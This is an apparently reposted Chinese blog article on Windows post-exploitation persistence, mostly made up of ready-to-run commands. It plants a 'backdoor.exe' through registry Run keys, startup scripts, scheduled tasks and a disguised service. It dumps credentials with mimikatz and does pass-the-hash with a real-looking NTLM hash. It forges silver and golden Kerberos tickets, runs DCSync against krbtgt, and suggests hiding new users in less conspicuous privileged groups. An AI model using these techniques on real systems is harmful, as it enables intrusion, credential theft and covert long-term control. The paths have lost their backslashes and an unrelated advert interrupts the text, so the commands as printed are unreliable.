在网络安全领域,一个完整的攻击生命周期通常包含以下7个主要步骤:
Recon(侦察)、Weaponisation(武器化)、Delivery(投递)、Exploitation(利用)、Installation(安装)、Command & Control(命令与控制)和Actions on Objectives(对目标采取行动)。其中,第5个步骤“Installation”指的是在不需要重复前4个步骤的情况下,重新获得对系统的命令和控制权。当某些操作无法进行时,可能需要考虑权限问题、UAC策略等。
本文将介绍一些基本的持久性策略和技术。通常,触发C2通道(命令与控制通道)的持久性机制存在于以下级别之一:
中等强制级别,在标准用户的上下文中。在SYSTEM的背景下强制性水平较高。
UserLand 技术
在UserLand层面,常用的注册表路径包括:
HKCU:HKCR:HKEY_CLASSES_ROOTHKCU:HKEY_CURRENT_USERHKLM:HKEY_LOCAL_MACHINEHKU:HKEY_USERSHKCC:HKEY_CURRENT_CONFIG
例如,可以在HKCUSoftwareMicrosoftWindows(或其他路径)中创建一个REG_SZ值(字符串值):
name: Backdoordata: C:usersCreaTeAppDataLocalTempackdoor.exe
启动:
在用户启动文件夹中创建批处理脚本:
@ echo offstart /d "C:WindowsSystem32" calc.exepause
批处理脚本的作用是每次开机时启动脚本,从而触发backdoor.exe。
计划任务:
标贝科技
标贝科技-专业AI语音服务的人工智能开放平台
14 查看详情
使用PowerShell创建计划任务:
PS C:> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/cC:UsersRastaAppDataLocalTempbackdoor.exe"PS C:> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"PS C:> $P = New-ScheduledTaskPrincipal "Rasta"PS C:> $S = New-ScheduledTaskSettingsSetPS C:> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SPS C:> Register-ScheduledTask Backdoor -InputObject $D
Powershell配置文件:
Elevated技术
在Elevated层面,常用的注册表路径包括:
HKLM:HKLM:HKEY_LOCAL_MACHINEHKLMSoftwareMicrosoftWindows
可以在这里设置name和data值。
服务:
创建一个将自动或按需启动的服务:
PS C:> New-Service -Name "Backdoor" -BinaryPathName "C:WindowsTempbackdoor.exe" -Description "Nothing to see here."
计划任务:
以System身份运行,每天上午9点触发:
PS C:> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/cC:WindowsTempbackdoor.exe"PS C:> $T = New-ScheduledTaskTrigger -Daily -At 9amPS C:> $P = New-ScheduledTaskPrincipal "NT AUTHORITYSYSTEM" -RunLevel HighestPS C:> $S = New-ScheduledTaskSettingsSetPS C:> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SPS C:> Register-ScheduledTask Backdoor -InputObject $D
维持特权:
使用runas脚本:
http://xinn.org/RunasVBS.html
参考:
https://blog.csdn.net/u010984552/article/details/54891615
NTLM哈希:
权限始终是一个问题,可以导出Server Hash:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txt
使用sekurlsa::pth命令:
sekurlsa::pth /user:Administrator /domain:GOD/ntlm:ccef208c6485269c20db2cad21734fe7 (/run:运行的程序,默认cmd)
添加新的本地用户可以提供一种返回计算机的方法。如果将它们放在Administrators组中太明显,请使用其他特权组,例如Remote Desktop Users,Remote Management Users或Backup Operators。
白银票据:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txtmimikatz "kerberos::golden /domain: /sid: /target: /service: /rc4: /user:/ptt" exit
参考:
https://paper.tuisec.win/detail/af2385f4ed3a391
kerberos::golden /domain:GOD /sid:S-1-5-21-1218902331-2157346161-1782232778 /target: WebServer /service: cifs/rc4:518b98ad4178a53695dc997aa02d455c /user:Administrator /ptt exit
OWA2010CN-God
黄金票据:
拿下域控:
lsadump::dcsync /domain:域名 /user:krbtgtms14068mimikatz kerberos::golden /domain: /sid: /rc4: /user: /ptt exit
来源:Ms08067安全实验室
以上就是持续控制技术和策略(A View of Persistence)的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/358703.html
微信扫一扫 
支付宝扫一扫 
